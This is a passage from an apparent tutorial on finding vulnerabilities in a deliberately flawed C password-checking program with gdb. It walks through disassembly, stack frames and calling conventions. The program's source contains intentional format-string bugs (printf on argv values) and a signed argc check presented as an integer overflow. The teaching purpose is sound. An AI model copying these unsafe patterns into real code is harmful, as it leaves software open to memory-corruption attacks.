class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis time we will not exploit this application (we've done that already), instead we'll just use the debugger it figure out that these vulnerabilities exist./p h2Setting Up The Environment/h2 pThis is the same as in part a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a so please refer to the strongSetting Up The Environment/strong section of 1 of those./p h2Looking For The Juicy Bits/h2 pFirst we'll test the application as usual:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"testuser@dev:~$ echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"/code/pre/div /td/tr/table pNothing unusual there but we now know that the application takes 1 argument. If we open this using codegdb/code we can have a closer look at it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"info functions/span/span span class="code-line"span class="go"All defined functions:/span/span span class="code-line"/span span class="code-line"span class="go"Non-debugging symbols:/span/span span class="code-line"span class="go"0x0804842e _init/span/span span class="code-line"span class="go"0x08048460 strcmp/span/span span class="code-line"span class="go"0x08048460 strcmp@plt/span/span span class="code-line"span class="go"0x08048470 printf/span/span span class="code-line"span class="go"0x08048470 printf@plt/span/span span class="code-line"span class="go"0x08048480 fclose/span/span span class="code-line"span class="go"0x08048480 fclose@plt/span/span span class="code-line"span class="go"0x08048490 _IO_getc/span/span span class="code-line"span class="go"0x08048490 _IO_getc@plt/span/span span class="code-line"span class="go"0x080484a0 puts/span/span span class="code-line"span class="go"0x080484a0 puts@plt/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__@plt/span/span span class="code-line"span class="go"0x080484c0 exit/span/span span class="code-line"span class="go"0x080484c0 exit@plt/span/span span class="code-line"span class="go"0x080484d0 strlen/span/span span class="code-line"span class="go"0x080484d0 strlen@plt/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main@plt/span/span span class="code-line"span class="go"0x080484f0 fopen/span/span span class="code-line"span class="go"0x080484f0 fopen@plt/span/span span class="code-line"span class="go"0x08048500 putchar/span/span span class="code-line"span class="go"0x08048500 putchar@plt/span/span span class="code-line"span class="go"0x08048510 strncpy/span/span span class="code-line"span class="go"0x08048510 strncpy@plt/span/span span class="code-line"span class="go"0x08048520 _start/span/span span class="code-line"span class="go"0x08048550 deregister_tm_clones/span/span span class="code-line"span class="go"0x08048580 register_tm_clones/span/span span class="code-line"span class="go"0x080485c0 __do_global_dtors_aux/span/span span class="code-line"span class="go"0x080485e0 frame_dummy/span/span span class="code-line"span class="go"0x0804860c main/span/span span class="code-line"span class="go"0x080486a2 checkpass/span/span span class="code-line"span class="go"0x080486f0 printfile/span/span span class="code-line"span class="go"0x08048760 __libc_csu_fini/span/span span class="code-line"span class="go"0x08048770 __libc_csu_init/span/span span class="code-line"span class="go"0x080487ca __i686.get_pc_thunk.bx/span/span span class="code-line"span class="go"0x080487d0 _fini/span/span span class="code-line"/code/pre/div /td/tr/table pHere we can tell that the application was written in a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a because it includes code__libc_start_main/code on lines 25 and 26. This means we have a codemain/code function which is the start of our application (shown on line 38)./p pThere are a couple of other functions of interest here but let's leave them for a bit and look at the codemain/code function:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;puts@pltgt;/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;putchar@pltgt;/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pThe first 4 instructions are the a href="https://en.wikipedia.org/wiki/Function_prologue" target="_blank"function prologue/a (lines 3, 4, 5 and 6). Here the a href="http://en.citizendium.org/wiki/Stack_frame" target="_blank"stack frame/a is set up./p pThe last 2 instructions are the a href="https://en.wikipedia.org/wiki/Function_prologue#Epilogue" target="_blank"function epilogue/a (lines 39 and 40). Here the codeleave/code instruction preforms the inverse of what the prologue did./p pLooking at the prologue and epilogue we can see that the a href="https://en.wikipedia.org/wiki/Calling_convention" target="_blank"calling convention/a is probably a href="https://en.wikipedia.org/wiki/X86_calling_conventions#cdecl" target="_blank"cdecl/a./p pI will not go into calling conventions much here, because it isn't terribly relevant although its important to know what they are and the differences, but a calling convention basically defines how a function is called./p pBack on topic, initially when looking for a vulnerability we should check some of the known vulnerable functions commonly used by developers. The main 1's are the codeprintf/code family of functions and the string copying/moving functions./p pLooking back at our list of functions, a couple of interest are being used. Mainly codeprintf/code and codestrncpy/code. In the main function though only codeprintf/code out of those 2 is being used. Let's examine them a little closer./p pThe first, on line 10, is set up on line 9 with an argument:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWhat the first instruction is doing here is moving the address code0x80487f0/code into the address strongpointed to/strong by the a href="http://www.c-jump.com/CIS77/ASM/Stack/S77_0040_esp_register.htm" target="_blank"ESP register/a. These 2 lines relate to line 17 in our source code above./p pThe ESP register points to the top of the a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a and in the cdecl calling convension, before the actual call to the function, its arguments are strongpushed/strong onto the stack in reverse order. As there is only 1 argument to this call only 1 is put on the stack./p pTo be honest, this call doesn't look like its going to be of interest as the argument is a static address and it points to the a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a of memory which isn't writable, but we can check the value of this just to make sure:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x80487f0/span/span span class="code-line"span class="go"0x80487f0: quot;Usage: quot;/span/span span class="code-line"/code/pre/div /td/tr/table pSo it looks to be part of an error message. The next call to codeprintf/code looks more interesting but first we need to understand how a stack frame is arranged in an application like this./p h2Stack Frames/h2 pBelow is the top of an example stack frame which is getting ready for a function call:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pHere we are unable to see the base pointer (EBP) but we can see the stack pointer (ESP) which always points to the top of the stack./p pPutting arguments on the stack can be done in a number of ways. Firstly it can be done using the codepush/code instruction as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"push/spanspan class="w" /spanspan class="nb"eax/spanspan class="w"/span/span span class="code-line"span class="nf"push/spanspan class="w" /spanspan class="mh"0x80487f0/spanspan class="w"/span/span span class="code-line"span class="nf"push/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebp/spanspan class="o"+/spanspan class="nv"c/spanspan class="p"]/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere the value is the EAX register is being strongpushed/strong onto the stack as the third argument (or "ARG 3" in our diagram), then the static value code0x80487f0/code as the second argument and finally EBP+c (or EBP+12, which is usually the second argument to the current function) as the first argument./p pThe codepush/code instruction automatically adjusts the value of ESP accordingly but it can also be done manually:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"sub/spanspan class="w" /spanspan class="nb"esp/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xc/spanspan class="w"/span/span span class="code-line"span class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"esp/spanspan class="o"+/spanspan class="mi"8/spanspan class="p"],/spanspan class="w" /spanspan class="nb"eax/spanspan class="w"/span/span span class="code-line"span class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"esp/spanspan class="o"+/spanspan class="mi"4/spanspan class="p"],/spanspan class="w" /spanspan class="mh"0x80487f0/spanspan class="w"/span/span span class="code-line"span class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"esp/spanspan class="p"],/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebp/spanspan class="o"+/spanspan class="nv"c/spanspan class="p"]/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis set of instructions are functionally the same as the previous. These are followed by a codecall/code instruction and after the call instruction our stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe codecall/code instruction autmatically strongpushes/strong the memory address of the next instruction onto the stack. This is done so that when a function returns the application knows where to start executing instructions./p pInside the function that we have just called we start executing that functions prologue. First there is a codepush ebp/code instruction which does this to the stack:/p pimg src="/assets/images/x86-32-linux/stack3.jpg" width="300"/p pAfter that it executes codemov ebp, esp/code:/p pimg src="/assets/images/x86-32-linux/stack4.jpg" width="300"/p pLastly any space for needed for local variables is subtracted from ESP (codesub esp, 0x8/code), so our stack ends up like this:/p pimg src="/assets/images/x86-32-linux/stack5.jpg" width="300"/p pEBP always points to the start of the current functions stack frame and ESP to the top of the stack so if we call another function inside the current function the same process would happen./p pThe functions epilogue does the opposite, in the application we are debugging it just have to codeleave/code instruction. The codeleave/code instruction automates the cleanup of the stack frame./p pIn our example stack, the codeleave/code function would be equivalent to:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"add/spanspan class="w" /spanspan class="nb"esp/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x8/spanspan class="w"/span/span span class="code-line"span class="nf"pop/spanspan class="w" /spanspan class="nb"ebp/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis would bring our stack frame back to this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pAnd then the final coderet/code instruction would remove the strongRET ADDR/strong from the stack setting everything back to how it was before the function call, coderet/code essentially does codepop eip/code./p h2Juicy Bits Continued/h2 pNow that we understand how the stack works we can have a look at that second call to codeprintf/code. The first argument to codeprintf/code is always the format string so when looking for a format string vulnerability we are trying to figure out if we can control the first argument./p pThe relevant lines that setup and call codeprintf/code are:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pThese 4 lines of code is actually line 18 in the source of the application. Line 1 moves the second argument (codeebp+0xc/code) (the second argument is always +C or +12 because EBP points to the old EBP, +4 points to the return address and +8 points to the first argument) into EAX./p pIn C the second argument to the main function is a list of pointers to the actual application arguments./p pBecause this argument is an array of pointers, line 2 moves the first pointer in this array into EAX (this normally points to the path of the application itself)./p pThis pointer is moved to the address pointed to by ESP (the top of the stack) and finally codeprintf/code is called. This shows that only 1 argument was given and that argument is the application path./p pWe can check this using codegdb/code but first there was a conditional statement which determined if this code got executed:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="x" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the codeif/code statement on line 16 of the source code./p pLine 1 compares the first argument codeebp+0x8/code, with 1 and jumps to code0x804864c/code if the first argument is greater than 1. As you can see the assembly condition is the opposite to what is in the source code, this is often the case./p pIn C the first argument to the main function is the number of arguments give to the application on the command line so to enter the section of code we want to analyse we just need to give the application 1 argument (the name of the application is considered the first argument so there is always at least 1)./p h3Integer Overflow/h3 pThe codejg/code instruction means that the numbers that are being compared are signed (it would be codeja/code if they were unsigned) and because there is no bound checking done on codeebp+0x8/code, it is vulnerable to an integer overflow:/p pI wanted to demostrate this as soon as I realised but because it is an integer I need to send at least 2147483647 arguments, I couldn't do this on my test machine because there just isn't enough RAM./p pSo in the name of science, I rewrote the application so that the codeargc/code argument (or the number of arguments passed to the main function) is a codechar/code instead, here is my new application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan 